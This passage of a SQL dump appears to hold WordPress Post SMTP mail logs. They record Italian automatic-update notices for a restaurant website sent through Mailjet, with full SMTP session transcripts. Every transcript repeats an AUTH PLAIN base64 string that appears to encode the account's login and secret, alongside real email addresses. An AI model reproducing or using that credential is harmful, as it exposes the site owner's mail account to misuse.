automaticamente\r\nDate: Fri, 19 Feb 2021 00:23:35 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Newsletter, SMTP, Email mark=\r\neting and Subscribe forms by Sendinblue (da versione 3.1.4 a 3.1.5)=0A-=\r\n Smash Balloon Instagram Feed (da versione 2.7 a 2.8)=0A=0A=0ASe hai pro=\r\nblemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di=\r\n supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutar=\r\nti.=0Ahttps://it.wordpress.org/support/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 39a848be-a640-4eeb-be58-768655530097\r\n'),(58611,4624,'to_header','webmaster@baldisserri.com'),(58612,4624,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58613,4624,'original_to','webmaster@baldisserri.com'),(58614,4624,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58615,4624,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (da versione 3.1.5 a 3.1.6)\n- Really Simple SSL (da versione 4.0.8 a 4.0.9)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58616,4624,'original_headers',''),(58617,4624,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <6b33aebfd2c21daa38b6045df60689d5@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Mon, 22 Feb 2021 12:52:53 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Newsletter, SMTP, Email mark=\r\neting and Subscribe forms by Sendinblue (da versione 3.1.5 a 3.1.6)=0A-=\r\n Really Simple SSL (da versione 4.0.8 a 4.0.9)=0A=0A=0ASe hai problemi d=\r\ni qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di suppor=\r\nto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.=0Ah=\r\nttps://it.wordpress.org/support/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as fbcc5f48-dbb4-45f0-b753-02e7f546b6a5\r\n'),(58618,4625,'_oembed_76d34b5eedeeb1f926ffe33948122eab','{{unknown}}'),(58619,4625,'_oembed_d47958ce6a38c71cc46ab62c68f83f0a','{{unknown}}'),(58620,4625,'_oembed_de32be3a80dec1a9f887b391b7813942','{{unknown}}'),(58621,4625,'solution','All good, mail sent.'),(58622,4625,'success','1'),(58623,4625,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58624,4625,'to_header','webmaster@baldisserri.com'),(58625,4625,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58626,4625,'original_to','webmaster@baldisserri.com'),(58627,4625,'original_subject','[Sol Y Mar] Il tuo sito è aggiornato a WordPress 5.6.2'),(58628,4625,'original_message','Ciao! Il tuo sito su https://www.ristorantesolymar.it/vecchio è stato aggiornato automaticamente a WordPress 5.6.2.\n\nNon è richiesta da parte tua alcuna altra operazione. Per altre informazioni sulla versione 5.6.2 vedi la schermata Informazioni su WordPress:\nhttps://www.ristorantesolymar.it/vecchio/wp-admin/about.php\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nVi sono anche alcuni plugin o temi con aggiornamenti disponibili. Aggiornali ora:\nhttps://www.ristorantesolymar.it/vecchio/wp-admin/\n\nIl team di WordPress\n'),(58629,4625,'original_headers',''),(58630,4625,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <355cba371c2a2f2e1e6ef2e98e848fb5@ristorantesolymar.it>\r\nSubject: =?UTF-8?Q?[Sol=20Y=20Mar]=20Il=20tuo=20sito=20=C3=A8=20aggiornato=20?=\r\n =?UTF-8?Q?a=20WordPress=205.6.2?=\r\nDate: Tue, 23 Feb 2021 01:08:25 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Il tuo sito su https://www.ristorantesolymar.it/vecchio =C3=A8 sta=\r\nto aggiornato automaticamente a WordPress 5.6.2.=0A=0ANon =C3=A8 richies=\r\nta da parte tua alcuna altra operazione. Per altre informazioni sulla ve=\r\nrsione 5.6.2 vedi la schermata Informazioni su WordPress:=0Ahttps://www.=\r\nristorantesolymar.it/vecchio/wp-admin/about.php=0A=0ASe hai problemi di=\r\n qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di support=\r\no su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.=0Aht=\r\ntps://it.wordpress.org/support/forums/=0A=0AVi sono anche alcuni plugin=\r\n o temi con aggiornamenti disponibili. Aggiornali ora:=0Ahttps://www.ris=\r\ntorantesolymar.it/vecchio/wp-admin/=0A=0AIl team di WordPress=0A\r\n.\r\n250 OK queued as 88e6e193-8a6a-404a-a0c1-9816ae2a388c\r\n'),(58631,4626,'_oembed_d47958ce6a38c71cc46ab62c68f83f0a','{{unknown}}'),(58632,4626,'solution','All good, mail sent.'),(58633,4626,'success','1'),(58634,4626,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58635,4626,'to_header','webmaster@baldisserri.com'),(58636,4626,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58637,4626,'original_to','webmaster@baldisserri.com'),(58638,4626,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58639,4626,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Smash Balloon Instagram Feed (da versione 2.8 a 2.8.1)\n- Yoast SEO (da versione 15.8 a 15.9)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58640,4626,'original_headers',''),(58641,4626,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <ea5b39b047389995496c7ce59b4e9257@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Tue, 23 Feb 2021 12:40:22 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Smash Balloon Instagram Feed=\r\n (da versione 2.8 a 2.8.1)=0A- Yoast SEO (da versione 15.8 a 15.9)=0A=0A=\r\n=0ASe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari=\r\n dei forum di supporto su https://it.wordpress.org/forums/ possono riusc=\r\nire ad aiutarti.=0Ahttps://it.wordpress.org/support/forums/=0A=0AIl team=\r\n di WordPress\r\n.\r\n250 OK queued as b024c78f-b215-48e4-9ed6-d3df92573c58\r\n'),(58642,4627,'_oembed_d47958ce6a38c71cc46ab62c68f83f0a','{{unknown}}'),(58643,4627,'solution','All good, mail sent.'),(58644,4627,'success','1'),(58645,4627,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58646,4627,'to_header','webmaster@baldisserri.com'),(58647,4627,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58648,4627,'original_to','webmaster@baldisserri.com'),(58649,4627,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58650,4627,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Contact Form 7 (da versione 5.3.2 a 5.4)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58651,4627,'original_headers',''),(58652,4627,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <33b55a389e21d5eccda9b2670e656ef1@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Wed, 24 Feb 2021 12:23:52 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Contact Form 7 (da versione=\r\n 5.3.2 a 5.4)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di=\r\n aiuto, i volontari dei forum di supporto su https://it.wordpress.org/fo=\r\nrums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/f=\r\norums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as c84551d5-e0cf-4bbd-90f1-4270b4504766\r\n'),(58653,4628,'_oembed_d47958ce6a38c71cc46ab62c68f83f0a','{{unknown}}'),(58654,4628,'solution','All good, mail sent.'),(58655,4628,'success','1'),(58656,4628,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58657,4628,'to_header','webmaster@baldisserri.com'),(58658,4628,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58659,4628,'original_to','webmaster@baldisserri.com'),(58660,4628,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58661,4628,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Really Simple CAPTCHA (da versione 2.0.2 a 2.1)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58662,4628,'original_headers',''),(58663,4628,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <4d4a245966f9e4adfa5f9f642a574321@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Sun, 28 Feb 2021 14:33:09 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Really Simple CAPTCHA (da ve=\r\nrsione 2.0.2 a 2.1)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai biso=\r\ngno di aiuto, i volontari dei forum di supporto su https://it.wordpress.=\r\norg/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/sup=\r\nport/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 527d6725-6a78-4e43-ac63-348d4b94b62d\r\n'),(58664,4629,'_oembed_d47958ce6a38c71cc46ab62c68f83f0a','{{unknown}}'),(58665,4629,'solution','All good, mail sent.'),(58666,4629,'success','1'),(58667,4629,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58668,4629,'to_header','webmaster@baldisserri.com'),(58669,4629,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58670,4629,'original_to','webmaster@baldisserri.com'),(58671,4629,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58672,4629,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Akismet Anti-Spam (da versione 4.1.8 a 4.1.9)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58673,4629,'original_headers',''),(58674,4629,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <9f3c10b06f35e56cd55ef1692bc5feea@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Wed, 03 Mar 2021 01:08:33 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Akismet Anti-Spam (da versio=\r\nne 4.1.8 a 4.1.9)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogn=\r\no di aiuto, i volontari dei forum di supporto su https://it.wordpress.or=\r\ng/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/suppo=\r\nrt/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 6506cfe3-c60f-4149-838c-7be65b4c2eb5\r\n'),(58675,4630,'_oembed_d47958ce6a38c71cc46ab62c68f83f0a','{{unknown}}'),(58676,4630,'solution','All good, mail sent.'),(58677,4630,'success','1'),(58678,4630,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58679,4630,'to_header','webmaster@baldisserri.com'),(58680,4630,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58681,4630,'original_to','webmaster@baldisserri.com'),(58682,4630,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58683,4630,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Smash Balloon Instagram Feed (da versione 2.8.1 a 2.8.2)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58684,4630,'original_headers',''),(58685,4630,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <c1f928db6ec584b700be1dd57cc3eb9e@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Thu, 04 Mar 2021 05:52:39 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Smash Balloon Instagram Feed=\r\n (da versione 2.8.1 a 2.8.2)=0A=0A=0ASe hai problemi di qualsiasi tipo o=\r\n hai bisogno di aiuto, i volontari dei forum di supporto su https://it.w=\r\nordpress.org/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpres=\r\ns.org/support/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as d6131287-3046-4a57-9de2-f7e4a7c46b31\r\n'),(58686,4631,'_oembed_d47958ce6a38c71cc46ab62c68f83f0a','{{unknown}}'),(58687,4631,'solution','All good, mail sent.'),(58688,4631,'success','1'),(58689,4631,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58690,4631,'to_header','webmaster@baldisserri.com'),(58691,4631,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58692,4631,'original_to','webmaster@baldisserri.com'),(58693,4631,'original_subject','[Sol Y Mar] Alcuni 